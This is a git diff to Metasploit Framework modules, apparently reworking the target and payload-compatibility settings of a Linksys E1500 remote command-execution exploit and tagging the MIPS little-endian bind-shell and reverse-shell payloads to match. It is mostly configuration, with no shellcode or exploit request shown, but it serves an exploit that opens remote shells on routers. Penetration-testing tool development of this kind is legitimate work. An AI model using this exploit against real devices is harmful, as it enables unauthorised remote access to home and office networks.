diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb index e2d04558a8..d17e72e4b0 100644 --- a/modules/exploits/linux/http/linksys_e1500_up_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb @@ -35,41 +35,29 @@ class Metasploit3 < Msf::Exploit::Remote #'Platform' => 'linux', #'Arch' => ARCH_MIPSLE, 'Targets' => - [ - [ 'Unix CMD', - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix', - #only payload cmd/unix/generic should be possible - 'Payload' => - { - 'Compat' => - { - #not working :( - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic' - } - }, - } - ], - [ 'Linux Payload', - { - 'Arch' => ARCH_MIPSLE, - 'Platform' => 'linux', - 'DisableNops' => true, - #only mipsel payloads working ... - 'Payload' => - { - 'Compat' => - { - #not working :( - 'PayloadType' => 'mipsle', - 'RequiredCmd' => 'shell' - } - }, - } - ], + [ + [ 'CMD', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + } ], + [ 'Linux Mipsel Payload', + { + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux', + 'DisableNops' => true, + } + ], + ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd mipsle', + 'RequiredCmd' => 'generic shell_bind_tcp shell_reverse_tcp' + }, + }, 'DefaultTarget' => 1, )) @@ -156,8 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote request(cmd,user,pass,uri) else - #lets get some shells ... - + #thx to Juan for his awesome work on the mipsel payloads @pl = generate_payload_exe # diff --git a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb index c4f305f513..8ddbcb6a07 100644 --- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb @@ -26,6 +26,8 @@ module Metasploit3 'Arch' => ARCH_MIPSLE, 'Handler' => Msf::Handler::BindTcp, 'Session' => Msf::Sessions::CommandShellUnix, + 'PayloadType' => 'mipsle', + 'RequiredCmd' => 'shell_bind_tcp', 'Payload' => { 'Offsets' => {} , diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 38bb3a6462..50152bc8f0 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -29,6 +29,8 @@ module Metasploit3 'Arch' => ARCH_MIPSLE, 'Handler' => Msf::Handler::ReverseTcp, 'Session' => Msf::Sessions::CommandShellUnix, + 'PayloadType' => 'mipsle', + 'RequiredCmd' => 'shell_reverse_tcp', 'Payload' => { 'Offsets' => { },